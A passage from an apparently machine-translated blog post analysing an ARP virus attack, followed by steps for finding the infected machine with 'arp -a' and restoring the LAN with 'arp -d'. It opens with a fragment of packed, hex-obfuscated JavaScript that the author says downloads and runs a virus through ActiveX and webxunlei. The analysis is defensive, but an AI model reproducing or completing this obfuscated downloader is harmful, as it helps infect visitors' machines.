\ 8 \ g \ 9 \ k \ M \ g \ 9 \ M \ g \ 9 \ 4 \\ 5 \ 6 \ g \ 9 \ 5 \ 6 \ T \ g \ 9 \ q \ M \ l \ g \ 9 \ f \ 7 \ 4 \ g \ 9 \ l \ 1v \ y \ g \ 9 \ 4 \ k \ M \ \ g \ 9 \ I \ q \ g \ 9 \ d \ h \ y \ g \ 9 \ o \\ s \ y \ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ 1w \ f \ 3 \ 6 \ j \ 3 \ 4", "\ x"); Q} 14 ();', 62,95, '| x65 | x74 | x61 | x72 | x69 | x6e | x2e | x6f | x73 | x3b | x63 | x64 | x53 | x67 | x68 | x66 | odks63ls | x76 | x43 | x6c | x75 | x62 | x28 | x29 | x50 | x41 | x31 | x78 | x6d | corner stone | x2c | x77 | x79 | var | x45 | x3d | x30 | x49 | x7e | x54 | x4f | x7a | x58 | x2F | x2b | return | x46 | x3c | x6a | x52 | x3a | x2E | x33 | x6D | x2f | x7b | x7d | function | assort_panel_enabled | pslcdkc | x47 | x3e | x4c | x6E | x36 | x38 | x32 | null | try | new | ActiveXObject | catch | if | x57 | x6b | 106 | x3A | x6B | x6F | x6C | x4d | x44 | x35 | x4e | x5B | x5D | x71 | x55 '. split ('|'), 0 ,{}))
It's a long piece of code, and I found function (p, a, c, k, e, r), continue decoding, the code is very long, please check it by yourself, here, the above method is applied, encrypted by the encryption function, and then converted to the hexadecimal system. We try our best to confuse our line of sight to achieve ulterior motives, the main function of the code here is to use another method to download and run the virus. The idea is really advanced. It is actually to call webxunlei to download the virus and then run it, the author is really painstaking. I have applied two methods to download the virus. "You don't believe it! ", Haha
Anti-virus: After talking about the attack for half a day, I just analyzed what I was doing during the attack of the ARP virus. Next I will talk about the anti-virus issue. In fact, there are many related tutorials on the Internet, let me briefly summarize my anti-virus process;
1. If arp virus is detected, you must first find the computer that has been poisoned.
2. Network disconnection and anti-virus attacks for this machine
3. Recover LAN
The first step is the most critical. How can we find it?
Open the network neighbor on any client in the LAN, view the Working Group computer, and wait until the list is refreshed. Then, quickly click Start --> Run --> cmd --> arp-a and press Enter, if the number of machines is large, enter arp-a several times and check it carefully. You will find that the Mac address of one machine is the same as that of the Gateway. Congratulations, this is the poison source!
Come to the front of this machine (haha, there are so many nonsense), and I believe everyone has a lot of experience in the rest of the work, anti-virus! Install anti-virus software or reinstall the machine even more in the security mode. Simply put the virus off;
Finally, execute this command on a machine that cannot open the web page: Click start --> Run --> cmd --> arp-d and press Enter. ,

Finally, everything has recovered to calm. Is it a sense of accomplishment!

My first official BLOG technical article was finally completed. I hope you will enjoy it!